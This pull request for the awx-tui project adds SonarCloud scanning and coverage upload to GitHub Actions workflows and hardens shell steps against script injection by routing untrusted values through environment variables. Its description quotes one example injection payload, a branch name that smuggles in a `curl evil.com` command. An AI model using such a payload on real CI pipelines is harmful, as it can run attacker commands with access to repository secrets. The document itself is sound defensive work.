### PR TITLE
ci: add SonarCloud integration with script injection hardening

### DIFF
--- a/.github/workflows/pr-validation.yml
+++ b/.github/workflows/pr-validation.yml
@@ -75,7 +75,7 @@ jobs:
 
       - name: Upload coverage report
         if: matrix.python-version == '3.13'
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v5
         with:
           name: coverage-report
           path: coverage.xml

--- a/.github/workflows/pr-validation.yml
+++ b/.github/workflows/pr-validation.yml
@@ -64,8 +64,23 @@ jobs:
           python -c "import awx_tui; print(f'AWX TUI version: {awx_tui.__version__}')"
 
       - name: Run tests
+        if: matrix.python-version != '3.13'
         run: |
           python -m pytest tests/ -v --tb=short
+
+      - name: Run tests with coverage
+        if: matrix.python-version == '3.13'
+        run: |
+          python -m pytest tests/ -v --tb=short --cov=awx_tui --cov-report=xml:coverage.xml --cov-report=term
+
+      - name: Upload coverage report
+        if: matrix.python-version == '3.13'
+        uses: actions/upload-artifact@v4
+        with:
+          name: coverage-report
+          path: coverage.xml
+          retention-days: 30
+          if-no-files-found: warn
 
   package-test:
     name: Package Installation Test

--- a/.github/workflows/sonarcloud.yml
+++ b/.github/workflows/sonarcloud.yml
@@ -20,7 +20,7 @@ jobs:
           fetch-depth: 0
 
       - name: Download coverage report
-        uses: actions/download-artifact@v4
+        uses: actions/download-artifact@v5
         with:
           name: coverage-report
           run-id: ${{ github.event.workflow_run.id }}

--- a/.github/workflows/sonarcloud.yml
+++ b/.github/workflows/sonarcloud.yml
@@ -6,6 +6,11 @@ on:
     types:
       - completed
 
+permissions:
+  contents: read
+  pull-requests: read
+  actions: read
+
 jobs:
   sonarcloud:
     name: SonarCloud Scan
@@ -14,59 +19,53 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd  # v6
         with:
           ref: ${{ github.event.workflow_run.head_sha }}
           fetch-depth: 0
+          persist-credentials: false
+          show-progress: false
 
       - name: Download coverage report
-        uses: actions/download-artifact@v5
+        uses: dawidd6/action-download-artifact@2536c51d3d126276eb39f74d6bc9c72ac6ef30d3  # v16
         with:
+          github_token: ${{ secrets.GITHUB_TOKEN }}
+          workflow: "PR Validation"
+          run_id: ${{ github.event.workflow_run.id }}
           name: coverage-report
-          run-id: ${{ github.event.workflow_run.id }}
-          github-token: ${{ secrets.GITHUB_TOKEN }}
         continue-on-error: true
 
       - name: Get PR information
-        id: pr-info
         if: github.event.workflow_run.event == 'pull_request'
         env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
           REPO: ${{ github.repository }}
         run: |
-          pr_data=$(gh pr list --repo "$REPO" --state open --json number,headRefName --jq ".[] | select(.headRefName == \"$HEAD_BRANCH\")")
-          if [ -n "$pr_data" ]; then
-            pr_number=$(echo "$pr_data" | jq -r '.number')
-            pr_branch=$(echo "$pr_data" | jq -r '.headRefName')
-            echo "pr_number=$pr_number" >> "$GITHUB_OUTPUT"
-            echo "pr_branch=$pr_branch" >> "$GITHUB_OUTPUT"
-            echo "is_pr=true" >> "$GITHUB_OUTPUT"
-          else
-            echo "is_pr=false" >> "$GITHUB_OUTPUT"
+          PR_NUMBER=$(gh pr list --head "$HEAD_BRANCH" --repo "$REPO" --json number -q '.[0].number')
+          echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV
+          if [ -n "$PR_NUMBER" ]; then
+            PR_DATA=$(gh api "repos/$REPO/pulls/$PR_NUMBER")
+            echo "PR_BASE=$(echo "$PR_DATA" | jq -r '.base.ref')" >> $GITHUB_ENV
+            echo "PR_HEAD=$(echo "$PR_DATA" | jq -r '.head.ref')" >> $GITHUB_ENV
           fi
 
       - name: Build SonarCloud scanner args
-        id: sonar-args
         env:
-          IS_PR: ${{ steps.pr-info.outputs.is_pr }}
-          PR_NUMBER: ${{ steps.pr-info.outputs.pr_number }}
-          PR_BRANCH: ${{ steps.pr-info.outputs.pr_branch }}
-          HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
+          COMMIT_SHA: ${{ github.event.workflow_run.head_sha }}
+          EVENT_TYPE: ${{ github.event.workflow_run.event }}
         run: |
-          args=""
-          if [ "$IS_PR" == "true" ]; then
-            args="-Dsonar.pullrequest.key=$PR_NUMBER"
-            args="$args -Dsonar.pullrequest.branch=$PR_BRANCH"
-            args="$args -Dsonar.pullrequest.base=devel"
-          else
-            args="-Dsonar.branch.name=$HEAD_BRANCH"
+          SONAR_ARGS="-Dsonar.scm.revision=\"${COMMIT_SHA}\""
+          if [[ "$EVENT_TYPE" == "pull_request" && -n "${PR_NUMBER:-}" ]]; then
+            SONAR_ARGS="${SONAR_ARGS} -Dsonar.pullrequest.key=${PR_NUMBER}"
+            SONAR_ARGS="${SONAR_ARGS} -Dsonar.pullrequest.branch=${PR_HEAD}"
+            SONAR_ARGS="${SONAR_ARGS} -Dsonar.pullrequest.base=${PR_BASE}"
           fi
-          echo "args=$args" >> "$GITHUB_OUTPUT"
+          echo "SONAR_ARGS=${SONAR_ARGS}" >> $GITHUB_ENV
 
       - name: SonarCloud scan
-        uses: SonarSource/sonarqube-scan-action@v5
+        uses: SonarSource/sonarqube-scan-action@a31c9398be7ace6bbfaf30c0bd5d415f843d45e9  # v7
         env:
           SONAR_TOKEN: ${{ secrets.ANSIBLE_COMMUNITY_ORG_SONAR_TOKEN_CICD_BOT }}
         with:
-          args: ${{ steps.sonar-args.outputs.args }}
+          args: ${{ env.SONAR_ARGS }}

--- a/.github/workflows/sonarcloud.yml
+++ b/.github/workflows/sonarcloud.yml
@@ -1,0 +1,72 @@
+name: SonarCloud
+
+on:
+  workflow_run:
+    workflows: ["PR Validation"]
+    types:
+      - completed
+
+jobs:
+  sonarcloud:
+    name: SonarCloud Scan
+    runs-on: ubuntu-latest
+    if: github.event.workflow_run.conclusion == 'success'
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v6
+        with:
+          ref: ${{ github.event.workflow_run.head_sha }}
+          fetch-depth: 0
+
+      - name: Download coverage report
+        uses: actions/download-artifact@v4
+        with:
+          name: coverage-report
+          run-id: ${{ github.event.workflow_run.id }}
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+        continue-on-error: true
+
+      - name: Get PR information
+        id: pr-info
+        if: github.event.workflow_run.event == 'pull_request'
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
+          REPO: ${{ github.repository }}
+        run: |
+          pr_data=$(gh pr list --repo "$REPO" --state open --json number,headRefName --jq ".[] | select(.headRefName == \"$HEAD_BRANCH\")")
+          if [ -n "$pr_data" ]; then
+            pr_number=$(echo "$pr_data" | jq -r '.number')
+            pr_branch=$(echo "$pr_data" | jq -r '.headRefName')
+            echo "pr_number=$pr_number" >> "$GITHUB_OUTPUT"
+            echo "pr_branch=$pr_branch" >> "$GITHUB_OUTPUT"
+            echo "is_pr=true" >> "$GITHUB_OUTPUT"
+          else
+            echo "is_pr=false" >> "$GITHUB_OUTPUT"
+          fi
+
+      - name: Build SonarCloud scanner args
+        id: sonar-args
+        env:
+          IS_PR: ${{ steps.pr-info.outputs.is_pr }}
+          PR_NUMBER: ${{ steps.pr-info.outputs.pr_number }}
+          PR_BRANCH: ${{ steps.pr-info.outputs.pr_branch }}
+          HEAD_BRANCH: ${{ github.event.workflow_run.head_branch }}
+        run: |
+          args=""
+          if [ "$IS_PR" == "true" ]; then
+            args="-Dsonar.pullrequest.key=$PR_NUMBER"
+            args="$args -Dsonar.pullrequest.branch=$PR_BRANCH"
+            args="$args -Dsonar.pullrequest.base=devel"
+          else
+            args="-Dsonar.branch.name=$HEAD_BRANCH"
+          fi
+          echo "args=$args" >> "$GITHUB_OUTPUT"
+
+      - name: SonarCloud scan
+        uses: SonarSource/sonarqube-scan-action@v5
+        env:
+          SONAR_TOKEN: ${{ secrets.ANSIBLE_COMMUNITY_ORG_SONAR_TOKEN_CICD_BOT }}
+        with:
+          args: ${{ steps.sonar-args.outputs.args }}

--- a/sonar-project.properties
+++ b/sonar-project.properties
@@ -1,0 +1,13 @@
+sonar.projectKey=ansible-community_awx-tui
+sonar.organization=ansible-community
+sonar.projectName=awx-tui
+
+sonar.sources=awx_tui
+sonar.tests=tests
+sonar.python.version=3.12,3.13,3.14
+
+sonar.python.coverage.reportPaths=coverage.xml
+
+sonar.newCode.referenceBranch=devel
+
+sonar.exclusions=tests/**,.tox/**,.venv/**,build/**,dist/**


### PR DESCRIPTION
## Summary

- Add SonarCloud workflow (`.github/workflows/sonarcloud.yml`) triggered on PR Validation completion
- Harden all `run:` blocks against GitHub Actions script injection by passing untrusted context values (`head_branch`, `repository`, step outputs) through `env:` variables instead of inline `${{ }}` expansion
- Add coverage report generation and upload to `pr-validation.yml` for Python 3.13 builds
- Add `sonar-project.properties` configuration

## Security

Attacker-controlled values like `github.event.workflow_run.head_branch` were previously interpolated directly into shell scripts, allowing a crafted branch name (e.g. containing `"; curl evil.com #`) to execute arbitrary commands with access to `SONAR_TOKEN`. All such values are now passed via `env:`, which the runner sets as process environment variables — immune to shell injection.

## Test plan

- [ ] Verify PR Validation workflow still passes
- [ ] Verify SonarCloud workflow triggers after PR Validation completes
- [ ] Verify coverage report is uploaded as artifact from Python 3.13 build
- [ ] Confirm no `${{ }}` expressions appear inside `run:` blocks in `sonarcloud.yml`

🤖 Generated with [Claude Code](https://claude.com/claude-code)